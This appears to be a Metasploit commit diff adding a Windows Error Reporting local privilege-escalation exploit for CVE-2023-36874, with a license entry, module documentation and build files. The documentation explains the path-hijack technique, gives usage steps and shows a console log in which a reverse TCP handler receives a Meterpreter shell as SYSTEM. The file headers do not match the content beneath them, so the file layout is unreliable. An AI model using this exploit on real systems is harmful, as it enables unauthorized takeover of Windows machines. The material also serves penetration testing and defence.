Land rapid7#18314, Windows Error Reporting RCE (CVE-2023-36874)

Author: cdelafuente-r7

LICENSE

@@ -85,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT
 
+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+         function calls to implement the exploit.  The heavily modified C main is necessary
+         to create and trigger the exploit.
+
 Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
 Copyright: 2011 Jon Bringhurst
 License: GNU GPL 2.0

data/exploits/CVE-2023-36874/CVE-2023-36874.exe

@@ -0,0 +1,113 @@
+## Vulnerable Application
+This module works only on Windows 10x64 22H2
+
+### Introduction
+
+This module takes advantage of a bug in the way Windows error reporting opens the report
+parser.  If you open a report, Windows uses a relative path to locate the rendering program.
+By creating a specific alternate directory structure, we can coerce Windows into opening an
+arbitrary executable as SYSTEM.
+If the current user is a local admin, the system will attempt impersonation and the exploit will
+fail.  Because the payload is added to a directory this module creates, in the event of successful
+exploitation, the user will need to delete the payload and the directories containing the payload
+manually.
+
+This module will attempt to delete the payload it uploads and the directory structure.
+
+## Installation Instructions
+1. Install Windows 10x64 22H2
+1. Create a standard user
+
+
+## Verification Steps
+
+1. Create a session on the target system under the context of a non local administrative user.
+1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
+1. Set the `PAYLOAD` and configure it correctly.
+1. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+1. Make sure that the `SESSION` value is set to the existing session identifier.
+1. Invoke the module: `run`.
+
+
+## Options
+
+### EXPLOIT_NAME
+
+The filename to use for the exploit binary (%RAND%.exe by default)
+
+### REPORT_DIR
+
+The Error Directory to use (%RAND% by default).
+
+### REPORT_NAME
+
+The Error report name (%RAND% by default).
+
+### SHADOW_DRIVE
+
+Directory to place in the home drive for pivot (%TEMP% by default).
+
+### EXECUTE_DELAY
+
+The number of seconds to delay between file upload and exploit launch.  Default is 3.
+
+## Scenarios
+
+### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)
+
+```
+msf6 exploit(windows/local/win_error_cve_2023_36874) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OS version: Windows 10+ Build 19045
+[+] The target appears to be vulnerable.
+[*] Shadow Path = C:\NpIWBsCJozK
+[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
+[*] C:\ProgramData
+[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating directory C:\NpIWBsCJozK
+[*] C:\NpIWBsCJozK created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\
+[*] C:\NpIWBsCJozK\ProgramData\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating C:\NpIWBsCJozK\system32
+[*] Creating directory C:\NpIWBsCJozK\system32
+[*] C:\NpIWBsCJozK\system32 created
+[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
+[*] shadow_path = NpIWBsCJozK
+[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
+[*] Sending stage (200774 bytes) to 10.5.132.118
+[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] 
+[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
+[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.
+
+meterpreter > sysinfo
+Computer        : DESKTOP-V413087
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+```

data/exploits/CVE-2023-36874/Report.wer

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.32929.386
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-36874", "CVE-2023-36874\CVE-2023-36874.vcxproj", "{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.ActiveCfg = Debug|x64
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.Build.0 = Debug|x64
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.ActiveCfg = Debug|Win32
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.Build.0 = Debug|Win32
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.ActiveCfg = Release|x64
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.Build.0 = Release|x64
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.ActiveCfg = Release|Win32
+		{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {A022017A-2A80-4E35-A696-EB6884E52E5E}
+	EndGlobalSection
+EndGlobal

documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md

@@ -0,0 +1,152 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}</ProjectGuid>
+    <RootNamespace>CVE202336874</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve_2023_36874.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="def.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln

@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve_2023_36874.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="def.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>